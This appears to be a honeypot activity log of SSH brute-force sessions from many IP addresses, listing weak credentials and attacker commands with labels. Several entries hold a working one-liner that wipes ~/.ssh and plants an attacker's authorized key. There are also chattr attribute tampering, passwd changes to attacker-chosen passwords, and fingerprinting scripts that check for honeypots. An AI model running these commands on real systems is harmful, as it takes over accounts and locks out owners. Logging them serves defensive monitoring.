$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
๐ŸŽญ molten_cipher_root (161.132.4.167) โ€” Chincha Alta, Peru ยท 3 sessions ยท 12 cmds
2026-05-08 13:43 EDT ยท as root/123456, root/password
export โ†’ uname โ†’ cat (repeated export 3x)
$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ร—3
$ uname -s -v -n -m 2 > /dev/null ร—3
$ uname -m 2 > /dev/null ร—3
$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ร—3
๐ŸŽญ jittery_gouda_root_95 (192.42.116.95) โ€” Amsterdam, The Netherlands ยท 1 session ยท 3 cmds
2026-05-11 06:36 EDT ยท as admin/admin
CPU profiling โ†’ CPU profiling โ†’ ?
$ echo "bash --help; ls /proc/1/; cat /proc/1/mounts; cat /proc/cpuinfo; echo __1778495797416590359" | sh
โ†ณ CPU profiling
$ bash --help; ls /proc/1/; cat /proc/1/mounts; cat /proc/cpuinfo; echo __1778495797416590359
โ†ณ CPU profiling
$
๐ŸŽญ crimson_hanbok_root_164 (39.115.195.164) โ€” Seocho-gu, South Korea ยท 1 session ยท 2 cmds
2026-05-11 06:20 EDT ยท as oracle/oracle123!@#
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
๐ŸŽญ brisk_burger_root_218 (104.209.7.218) โ€” San Francisco, United States ยท 4 sessions ยท 28 cmds
2026-05-11 01:32 EDT ยท as root/1234, root/123456, root/12345678
execute from /tmp โ†’ password change attempt
$ echo "===HOSTNAME==="; hostname 2>/dev/null || echo EMPTY;; echo "===UNAME==="; uname -a 2>/dev/null || echo EMPTY;; echo "===WHOAMI==="; whoami 2>/dev/null || echo EMPTY;; echo "===PWD==="; pwd 2>/dev/null || echo EMPTY;; echo "===LS_ROOT==="; ls -la / 2>/dev/null | head -10 || echo EMPTY;; echo "===PS==="; ps aux 2>/dev/null | head -15 || echo EMPTY;; echo "===NETSTAT==="; netstat -tulpn 2>/dev/null | head -10 || echo EMPTY;; echo "===HISTORY==="; history 2>/dev/null | tail -5 || echo EMPTY;; echo "===SSH_VERSION==="; ssh -V 2>&1 || echo EMPTY;; echo "===UPTIME==="; uptime 2>/dev/null || echo EMPTY;; echo "===MOUNT==="; mount 2>/dev/null | head -5 || echo EMPTY;; echo "===ENV==="; env 2>/dev/null | head -10 || echo EMPTY;; echo "===CPU_CORES==="; nproc 2>/dev/null || grep -c '^processor' /proc/cpuinfo 2>/dev/null || echo 0;; echo "===ARCH==="; uname -m 2>/dev/null || echo unknown;; echo "===CPU_MODEL==="; grep 'model name' /proc/cpuinfo 2>/dev/null | head -1 | cut -d ':' -f2- | sed 's/^ *//' || echo unknown;; echo "===RESOURCES==="; echo MEMKB=$(awk '/MemTotal/{print $2}' /proc/meminfo 2>/dev/null) DISKKB=$(df / 2>/dev/null | awk 'NR==2{print $2}') USERCNT=$(wc -l < /etc/passwd 2>/dev/null) PKGCNT=$(dpkg -l 2>/dev/null | grep -c '^ii' || rpm -qa 2>/dev/null | wc -l || echo 0);; echo "===CONTAINER==="; cat /proc/1/cgroup 2>/dev/null | head -3; test -f /.dockerenv && echo DOCKERENV; test -f /run/.containerenv && echo CONTAINERENV; echo;; echo "===COWRIE==="; ls /opt/cowrie /home/richard /etc/cowrie 2>&1;; echo "===DMESG==="; dmesg 2>/dev/null | head -5 || echo EMPTY;; echo "===PORTS==="; ss -tulpn 2>/dev/null | grep LISTEN | head -20 || netstat -tulpn 2>/dev/null | grep LISTEN | head -20 || echo EMPTY;; echo "===NETCFG==="; ls -la /etc/network/interfaces /etc/sysconfig/network-scripts/ /etc/netplan/ 2>/dev/null | head -3 || echo EMPTY;; echo "===IPADDR==="; ip addr show 2>/dev/null | grep -E '^[0-9]+:' | head -5 || echo EMPTY;; echo "===IPROUTE==="; ip route show 2>/dev/null | head -3 || echo EMPTY;; echo "===WRITE==="; TF=/tmp/t_$$; echo test > $TF 2>&1 && echo WRITEOK && rm -f $TF || echo WRITEFAIL;; echo "===IDCHECK==="; id 2>/dev/null && echo IDOK || echo IDFAIL; whoami 2>/dev/null && echo WHOAMIOK || echo WHOAMIFAIL;; echo "===PKGMGR==="; which apt 2>/dev/null || which yum 2>/dev/null || which pacman 2>/dev/null || which zypper 2>/dev/null || echo NOPKG;; echo "===SERVICES==="; systemctl list-units --type=service --state=running 2>/dev/null | head -10 || echo NOSVC;; echo "===SOCKETS==="; ss -tuln 2>/dev/null | wc -l || echo 0;; echo "===GPU==="; nvidia-smi --query-gpu=name,memory.total,driver_version --format=csv,noheader 2>/dev/null || echo NOGPU;; echo "===MAXDISK==="; df -BG 2>/dev/null | awk 'NR>1{gsub("G","",$2); if($2+0>max) max=$2+0} END{print max+0}' || echo 0;; echo "===END===" ร—4
โ†ณ execute from /tmp
$ awk /MemTotal/{print $2} /proc/meminfo 2 > /dev/null ร—4
$ df / 2 > /dev/null | awk NR==2{print $2} ร—4
$ wc -l < /etc/passwd 2 > /dev/null ร—4
โ†ณ password change attempt
$ dpkg -l 2 > /dev/null | grep -c ^ii ร—4
$ rpm -qa 2 > /dev/null | wc -l ร—4
$ echo 0 ร—4
๐ŸŽญ baroque_bamboo_root (42.96.20.16) โ€” Hanoi, Vietnam ยท 1 session ยท 2 cmds
2026-05-11 01:14 EDT ยท as oracle/pass
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
๐ŸŽญ drowsy_jade_root (103.153.5.9) โ€” Haidian, China ยท 2 sessions ยท 4 cmds
2026-05-11 00:46 EDT ยท as oracle/oracle11, oracle/pass
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh ร—2
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ ร—2
โ†ณ SSH key persistence
๐ŸŽญ feral_jade_root_97 (14.103.127.97) โ€” Haidian, China ยท 1 session ยท 1 cmd
2026-05-11 00:01 EDT ยท as oracle/os10+ZTE
file attribute tampering
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
๐ŸŽญ venomous_dragon_root_146 (222.186.24.146) โ€” Nanjing, China ยท 1 session ยท 20 cmds
2026-05-10 23:56 EDT ยท as ubuntu/1q2w3e4r
file attribute tampering โ†’ SSH key persistence โ†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l
โ†ณ CPU profiling
$ echo -e "1q2w3e4r\ngQ2SvlFoZNkd\ngQ2SvlFoZNkd"|passwd|bash
$ Enter new UNIX password:
$ echo "1q2w3e4r\ngQ2SvlFoZNkd\ngQ2SvlFoZNkd\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'
โ†ณ CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l
โ†ณ persistence setup
$ w
โ†ณ logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l
โ†ณ CPU profiling
$ top
โ†ณ process monitoring
$ uname
โ†ณ OS identification
$ uname -a
โ†ณ OS/kernel identification
$ whoami
โ†ณ privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
๐ŸŽญ haywire_batik_root (41.216.177.55) โ€” Jakarta, Indonesia ยท 1 session ยท 2 cmds
2026-05-10 23:19 EDT ยท as oracle/test123
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
๐ŸŽญ scrappy_chai_root (103.248.120.6) โ€” Meerut, India ยท 1 session ยท 2 cmds
2026-05-10 23:00 EDT ยท as oracle/os10+ZTE
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
๐ŸŽญ rabid_cowboy_root (159.223.196.243) โ€” Santa Clara, United States ยท 1 session ยท 1 cmd
2026-05-10 22:44 EDT ยท as user/user
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -a
โ†ณ OS/kernel identification
๐ŸŽญ rabid_tulip_root (195.133.77.217) โ€” Amsterdam, The Netherlands ยท 1 session ยท 2 cmds
2026-05-10 22:41 EDT ยท as oracle/os10+ZTE
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
๐ŸŽญ weary_cipher_root (91.201.216.61) โ€” Almaty, Kazakhstan ยท 1 session ยท 2 cmds
2026-05-10 22:25 EDT ยท as oracle/os10+ZTE
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
๐ŸŽญ haywire_silk_root_81 (120.48.147.81) โ€” Beijing, China ยท 1 session ยท 2 cmds
2026-05-10 22:18 EDT ยท as oracle/test123
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
๐ŸŽญ unhinged_hawker_root (52.237.80.79) โ€” Singapore, Singapore ยท 1 session ยท 2 cmds
2026-05-10 21:50 EDT ยท as oracle/iflytek
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
๐ŸŽญ haywire_mekong_root (103.118.28.15) โ€” Liรชn Chiแปƒu, Vietnam ยท 1 session ยท 2 cmds
2026-05-10 20:33 EDT ยท as oracle/oracle2024
file attribute tampering โ†’ SSH key persistence (repeated file attribute tampering 4x)
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
๐ŸŽญ jittery_burger_root (43.166.245.172) โ€” Ashburn, United States ยท 1 session ยท 2 cmds
2026-05-10 19:51 EDT ยท as oracle/oracle2021
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
๐ŸŽญ sneaky_hawker_root_204 (45.78.198.204) โ€” Singapore, Singapore ยท 2 sessions ยท 4 cmds
2026-05-10 19:05 EDT ยท as oracle/abc123, oracle/abcd1234
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh ร—2
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ ร—2
โ†ณ SSH key persistence
๐ŸŽญ molten_hawker_root (43.156.21.38) โ€” Singapore, Singapore ยท 1 session ยท 2 cmds
2026-05-10 18:58 EDT ยท as oracle/welcome
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
๐ŸŽญ murky_dragon_root (180.76.104.44) โ€” Beijing, China ยท 1 session ยท 20 cmds
2026-05-10 18:46 EDT ยท as oracle/Root1234
file attribute tampering โ†’ SSH key persistence โ†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l
โ†ณ CPU profiling
$ echo -e "Root1234\ni15RPVfRcQsC\ni15RPVfRcQsC"|passwd|bash
$ Enter new UNIX password:
$ echo "Root1234\ni15RPVfRcQsC\ni15RPVfRcQsC\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'
โ†ณ CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l
โ†ณ persistence setup
$ w
โ†ณ logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l
โ†ณ CPU profiling
$ top
โ†ณ process monitoring
$ uname
โ†ณ OS identification
$ uname -a
โ†ณ OS/kernel identification
$ whoami
โ†ณ privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
๐ŸŽญ rusty_garuda_root (103.191.14.243) โ€” Utan, Indonesia ยท 1 session ยท 2 cmds
2026-05-10 18:43 EDT ยท as oracle/oralce
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
๐ŸŽญ feral_lantern_root (114.242.24.31) โ€” Beijing, China ยท 1 session ยท 20 cmds
2026-05-10 18:37 EDT ยท as oracle/mbs12!*!g#
file attribute tampering โ†’ SSH key persistence โ†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l
โ†ณ CPU profiling
